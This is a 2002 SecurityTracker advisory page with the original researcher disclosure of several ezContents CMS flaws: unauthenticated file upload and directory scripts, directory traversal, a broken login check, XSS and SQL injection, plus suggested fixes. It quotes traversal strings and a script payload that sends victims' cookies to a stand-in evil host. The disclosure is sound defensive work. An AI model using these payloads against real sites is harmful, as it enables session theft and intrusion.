Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
|
|
|
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
|
|
|
|
|
|
|
|
|
|
|
ezContents Web Content Management System Contains Multiple Flaws That Allow Remote Users to Create or Delete Directories and Inject SQL Commands and Allow Remote Authenticated Users to View Files on the System
|
|
SecurityTracker Alert ID: 1004840 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 25 2002
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
|
Exploit Included: Yes
|
Version(s): 1.41 and prior versions
|
Description: Several vulnerabilities were reported in the ezContents content management system. A remote user can create or delete directories,
upload files, and inject SQL commands to be executed by the underlying database. Remote authenticated users can also view files
and directories on the system.
A remote authenticated user with privileges to upload images can reportedly read any file on the web server that is readable by the
web server process. This is because the image file upload function does not properly validate the four global variables (file,
file_name, file_size and file_type) to ensure that a specified file has actually been uploaded.
A remote authenticated user can
apparently use the "Maintain Images:Add New:Create Subdirectory" function to create directories located outside of the ezContents
directory. This can be achieved by using '../' directory traversal characters in the directory name. A demonstration exploit name
is provided:
"../../../../../../../tmp/hellothere"
A remote user can create or delete directories and upload files without
logging in by using the createdir.php, removedir.php, or uploadfile.php scripts. These scripts reportedly do not check to see if
the remote user is authenticated.
A remote authenticated user can invoke the 'Maintain Images' file listing function to list
certain types of files in directories located outside of the ezContents directory. This can be achieved using the following type
of directory name:
"../../../../../usr/bin"
The VerifyLogin() function reportedly contains a flaw where, if the login attempt
fails, the remote user's web browser is redirected but the script continues to execute. A remote user can edit various information
by POSTing data to the appropriate script.
Several cross-site scripting flaws were reported. A remote user can create malcious
Javascript that, when viewed by another target (victim) user, will cause arbitrary scripting code to be executed by the target user's
browser. The code will originate from the site running ezContents and will run in the security context of that site. As a result,
the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site,
access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A
remote user can reportedly inject SQL commands to be executed by the underlying database server.
The vendor has reportedly been
notified.
|
Impact: A remote user can create or delete directories, upload files, and inject SQL commands to be executed by the underlying database.
A remote user can conduct cross-site scripting attacks to steal user cookies.
A remote authenticated user can view files and
directories on the system.
|
Solution: According to the report, the image upload file viewing vulnerability was fixed in version 1.41, available at:
http://download.visualshapers.com/ezContents_1_41.tar.gz
http://www.visualshapers.com/
No solution for the other vulnerabilities was available at the time of this entry.
|
Vendor URL: www.visualshapers.com/ (Links to External Site)
|
Cause: Access control error, Authentication error, Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Ulf Harnhammar <ulfh@update.uu.se>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 25 Jul 2002 16:00:25 +0200 (CEST)
From: Ulf Harnhammar <ulfh@update.uu.se>
Subject: ezContents multiple vulnerabilities
|
ezContents multiple vulnerabilities
PROGRAM: ezContents
VENDOR: Marek Lyczba et al. <info@visualshapers.com>
HOMEPAGE: http://www.visualshapers.com/
VULNERABLE VERSIONS: 1.40, 1.41, possibly others as well
NOT VULNERABLE VERSIONS: none (one hole fixed in 1.41)
LOGIN REQUIRED: yes (some issues), no (some issues)
SEVERITY: high
DESCRIPTION:
"ezContents is a Web site content management system based on
PHP and MySQL. Features include maintaining menus and sub-menus,
adding authors that can write contents, permissions, work flow, and
simple settings to customise layout and the look of the site. It is
possible to integrate external scripts, and frames as well frameless
Web site designs are supported."
(direct quote from the program's project page at Freshmeat)
According to the downloaded package, ezContents is released under the
terms of the GNU General Public License. According to the program's
homepage, it is released under the GNU General Public License with
some additional clauses, one which states that you have to ask
permission before using the program commercially. (Does the GPL
really allow you to add additional clauses?)
SECURITY HOLES:
1) The image file upload function allows uploads to occur, without
checking if the four global variables with information about an
upload (file, file_name, file_size and file_type) really were set
by uploading a file or if they were normal POST data. This means
that it can be fooled into treating any file that the web server
can read (like /etc/passwd) as the uploaded file.
You fix this by using PHP's is_uploaded_file() function, which
checks if a real upload has taken place.
This issue was corrected in ezContents 1.41.
2) Maintain Images:Add New:Create Subdirectory can create directories
outside of the ezContents directory, by using directory names like
"../../../../../../../tmp/hellothere".
3) The administrative scripts createdir.php, removedir.php and
uploadfile.php don't check if you're logged in or not. This means
that an attacker can create/remove directories and upload files to
the server by POSTing data to the right script with no need for a
username or a password.
4) Maintain Images' file listing can be fooled into listing
directories outside of the ezContents directory, if you use directory
names like "../../../../../usr/bin". It only lists certain types
of files, though.
5) The VerifyLogin() function redirects the web browser, if the
login fails. It doesn't stop the program's execution. This means
that the script still runs, just that you don't see it. Equipped
with this knowledge, an attacker without a username can edit lots of
different information by simply POSTing data to the right script, and
view lots of different information equipped with a tool like netcat.
6) ezContents has got some Cross-Site Scripting issues, in the
diary and other places. One user can enter some JavaScript code,
which will be executed when another user looks at that entry. This
can be used for stealing someone's cookies:
<script>self.location.href="http://evilsite.com/evil?"+
escape(document.cookie)</script>
You fix this with the htmlspecialchars() function.
7) Finally, there are some SQL Injection issues. They are of the
simple type where you don't really have to inject anything, because
the programmer didn't put apostrophes around the input variables
in the SQL statements.
COMMUNICATION WITH VENDOR:
The vendor was contacted on the 6th of June and on the 5th of July.
They are working on fixing these holes, but so far, only issue 1
above has been fixed.
// Ulf Harnhammar
ulfh@update.uu.se
|
|
Go to the Top of This SecurityTracker Archive Page
|
